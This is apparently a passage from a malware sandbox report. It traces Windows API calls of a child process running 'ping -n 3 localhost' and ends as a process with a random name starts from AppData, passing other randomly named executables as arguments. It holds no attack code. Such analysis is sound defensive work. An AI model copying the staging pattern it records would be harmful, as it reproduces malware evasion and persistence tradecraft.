[0103.600] exit (_Code=0) Thread: id = 41 os_tid = 0xc48 Thread: id = 42 os_tid = 0xc50 Thread: id = 43 os_tid = 0xc54 Process: id = "27" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16780" os_pid = "0xc38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0xbe8" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1796 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1797 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1798 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1799 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1800 start_va = 0x1c0000 end_va = 0x1c7fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 1801 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1802 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1803 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1804 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1805 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1897 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1898 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1899 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1900 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1901 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1902 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1903 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1904 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1905 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1906 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1907 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1908 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1909 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1910 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1911 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1912 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1913 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1914 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1915 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1916 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1917 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1918 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1919 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1920 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1921 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1922 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 1923 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1924 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1925 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1926 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1927 start_va = 0x1150000 end_va = 0x141efff entry_point = 0x1150000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1928 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1929 start_va = 0x1420000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 1930 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1931 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1932 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1933 start_va = 0x14c0000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 1976 start_va = 0x1440000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1977 start_va = 0x1480000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 1978 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1979 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2011 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2012 start_va = 0x170000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2057 start_va = 0x1610000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 2058 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 2134 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2135 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 39 os_tid = 0xc3c [0100.855] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc54 | out: lpSystemTimeAsFileTime=0x16fc54*(dwLowDateTime=0x7a1ee9e0, dwHighDateTime=0x1d440a9)) [0100.855] GetCurrentProcessId () returned 0xc38 [0100.856] GetCurrentThreadId () returned 0xc3c [0100.856] GetTickCount () returned 0x24191 [0100.856] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc4c | out: lpPerformanceCount=0x16fc4c*=15764478321) returned 1 [0100.856] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0100.856] __set_app_type (_Type=0x1) [0100.856] __p__fmode () returned 0x76b331f4 [0100.856] __p__commode () returned 0x76b331fc [0100.856] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1c2ae1) returned 0x0 [0100.856] __getmainargs (in: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8, _DoWildCard=0, _StartInfo=0x1c50e8 | out: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8) returned 0 [0100.856] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.857] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.857] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1c5440 | out: lpWSAData=0x1c5440) returned 0 [0100.862] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x16f6e4 | out: phkResult=0x16f6e4*=0x58) returned 0x0 [0100.862] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x16f6d8, lpData=0x16f6e0, lpcbData=0x16f6dc*=0x4 | out: lpType=0x16f6d8*=0x0, lpData=0x16f6e0*=0x0, lpcbData=0x16f6dc*=0x4) returned 0x2 [0100.862] RegCloseKey (hKey=0x58) returned 0x0 [0100.862] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x16f6ac*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x16f6d4 | out: ppResult=0x16f6d4*=0x0) returned 11001 [0100.862] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x16f6ac*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x16f6d4 | out: ppResult=0x16f6d4*=0x2946f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x2947b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2947e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x293a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0101.209] FreeAddrInfoW (pAddrInfo=0x2946f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x2947b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2947e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x293a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0101.209] Icmp6CreateFile () returned 0x298b40 [0101.385] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x294830 [0101.385] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x29ebb0 [0101.385] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16fbd4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0101.385] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x16f6d4, nSize=0x0, Arguments=0x16f6d0 | out: lpBuffer="XH)") returned 0x19 [0101.386] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x294858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0101.386] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.386] _write (in: _FileHandle=1, _Buf=0x294858*, _MaxCharCount=0x19 | out: _Buf=0x294858*) returned 25 [0101.386] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.386] LocalFree (hMem=0x294858) returned 0x0 [0101.386] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer="XH)") returned 0x18 [0101.386] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x294858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0101.386] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.386] _write (in: _FileHandle=1, _Buf=0x294858*, _MaxCharCount=0x18 | out: _Buf=0x294858*) returned 24 [0101.386] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.386] LocalFree (hMem=0x294858) returned 0x0 [0101.386] SetConsoleCtrlHandler (HandlerRoutine=0x1c17ca, Add=1) returned 1 [0101.386] Icmp6SendEcho2 (in: IcmpHandle=0x298b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x16f750, DestinationAddress=0x1c55e0, RequestData=0x294830, RequestSize=0x20, RequestOptions=0x16f700, ReplyBuffer=0x29ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x29ebb0) returned 0x1 [0101.394] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16fbd4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0101.394] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer=" Q)") returned 0x10 [0101.394] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x295120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0101.394] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.394] _write (in: _FileHandle=1, _Buf=0x295120*, _MaxCharCount=0x10 | out: _Buf=0x295120*) returned 16 [0101.395] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.395] LocalFree (hMem=0x295120) returned 0x0 [0101.395] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer="\x10<)") returned 0x9 [0101.395] CharToOemBuffA (in: lpszSrc="time=6ms ", lpszDst=0x293c10, cchDstLength=0x9 | out: lpszDst="time=6ms ") returned 1 [0101.395] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.395] _write (in: _FileHandle=1, _Buf=0x293c10*, _MaxCharCount=0x9 | out: _Buf=0x293c10*) returned 9 [0101.395] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.395] LocalFree (hMem=0x293c10) returned 0x0 [0101.395] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer=" \x8f)") returned 0x2 [0101.395] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x298f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0101.395] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.395] _write (in: _FileHandle=1, _Buf=0x298f20*, _MaxCharCount=0x2 | out: _Buf=0x298f20*) returned 2 [0101.395] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.395] LocalFree (hMem=0x298f20) returned 0x0 [0101.395] Sleep (dwMilliseconds=0x3e2) [0102.439] Icmp6SendEcho2 (in: IcmpHandle=0x298b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x16f750, DestinationAddress=0x1c55e0, RequestData=0x294830, RequestSize=0x20, RequestOptions=0x16f700, ReplyBuffer=0x29ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x29ebb0) returned 0x1 [0102.751] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16fbd4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0102.751] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer=" Q)") returned 0x10 [0102.751] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x295120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0102.751] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.751] _write (in: _FileHandle=1, _Buf=0x295120*, _MaxCharCount=0x10 | out: _Buf=0x295120*) returned 16 [0102.752] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.752] LocalFree (hMem=0x295120) returned 0x0 [0102.752] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer="\x10<)") returned 0x9 [0102.752] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x293c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0102.752] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.752] _write (in: _FileHandle=1, _Buf=0x293c10*, _MaxCharCount=0x9 | out: _Buf=0x293c10*) returned 9 [0102.752] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.752] LocalFree (hMem=0x293c10) returned 0x0 [0102.752] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer=" \x8f)") returned 0x2 [0102.752] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x298f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0102.752] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.752] _write (in: _FileHandle=1, _Buf=0x298f20*, _MaxCharCount=0x2 | out: _Buf=0x298f20*) returned 2 [0102.752] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.752] LocalFree (hMem=0x298f20) returned 0x0 [0102.752] Sleep (dwMilliseconds=0x3e8) [0103.830] Icmp6SendEcho2 (in: IcmpHandle=0x298b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x16f750, DestinationAddress=0x1c55e0, RequestData=0x294830, RequestSize=0x20, RequestOptions=0x16f700, ReplyBuffer=0x29ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x29ebb0) returned 0x1 [0103.984] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16fbd4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0103.985] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f6d8, nSize=0x0, Arguments=0x16f6d4 | out: lpBuffer=" Q)") returned 0x10 [0103.985] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x295120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0103.985] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.985] _write (in: _FileHandle=1, _Buf=0x295120*, _MaxCharCount=0x10 | out: _Buf=0x295120*) returned 16 [0103.985] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.985] LocalFree (hMem=0x295120) returned 0x0 [0103.985] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer="\x10<)") returned 0x9 [0103.985] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x293c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0103.985] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.985] _write (in: _FileHandle=1, _Buf=0x293c10*, _MaxCharCount=0x9 | out: _Buf=0x293c10*) returned 9 [0103.985] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.985] LocalFree (hMem=0x293c10) returned 0x0 [0103.985] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x16f6dc, nSize=0x0, Arguments=0x16f6d8 | out: lpBuffer=" \x8f)") returned 0x2 [0103.985] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x298f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0103.985] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.985] _write (in: _FileHandle=1, _Buf=0x298f20*, _MaxCharCount=0x2 | out: _Buf=0x298f20*) returned 2 [0103.985] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.985] LocalFree (hMem=0x298f20) returned 0x0 [0103.985] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x16f6a0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0103.985] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x16f670, nSize=0x0, Arguments=0x16f66c | out: lpBuffer="\xd0\x14\x2a") returned 0x56 [0103.986] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x2a14d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0103.986] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.986] _write (in: _FileHandle=1, _Buf=0x2a14d0*, _MaxCharCount=0x56 | out: _Buf=0x2a14d0*) returned 86 [0103.986] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.986] LocalFree (hMem=0x2a14d0) returned 0x0 [0103.986] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x16f680, nSize=0x0, Arguments=0x16f67c | out: lpBuffer="\xe8\x14\x2a") returned 0x61 [0103.986] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 6ms, Average = 2ms\r\n", lpszDst=0x2a14e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 6ms, Average = 2ms\r\n") returned 1 [0103.986] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.986] _write (in: _FileHandle=1, _Buf=0x2a14e8*, _MaxCharCount=0x61 | out: _Buf=0x2a14e8*) returned 97 [0103.986] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.986] LocalFree (hMem=0x2a14e8) returned 0x0 [0103.986] IcmpCloseHandle (IcmpHandle=0x298b40) returned 1 [0104.140] LocalFree (hMem=0x294830) returned 0x0 [0104.140] LocalFree (hMem=0x29ebb0) returned 0x0 [0104.140] WSACleanup () returned 0 [0104.234] exit (_Code=0) Thread: id = 44 os_tid = 0xc58 Thread: id = 45 os_tid = 0xc5c Thread: id = 46 os_tid = 0xc60 Process: id = "28" image_name = "sypykbck.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe" page_root = "0x7ea167c0" os_pid = "0xc40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0xc0c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 